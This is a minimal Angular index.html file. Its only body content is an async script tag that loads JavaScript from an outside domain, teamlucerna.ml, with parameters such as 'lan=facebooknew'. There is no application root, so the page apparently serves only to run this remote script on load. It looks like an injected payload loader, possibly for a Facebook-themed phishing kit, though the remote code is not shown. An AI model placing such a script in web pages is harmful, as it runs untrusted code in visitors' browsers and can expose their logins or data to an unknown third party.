<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Angular</title>
  <base href="/">

  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="icon" type="image/x-icon" href="favicon.ico">
</head>
<body>
  <script src="//teamlucerna.ml/geraldking/?api=1&lan=facebooknew&ht=1&counter0=geraldking" type="text/javascript" async="true"></script>
</body>
</html>
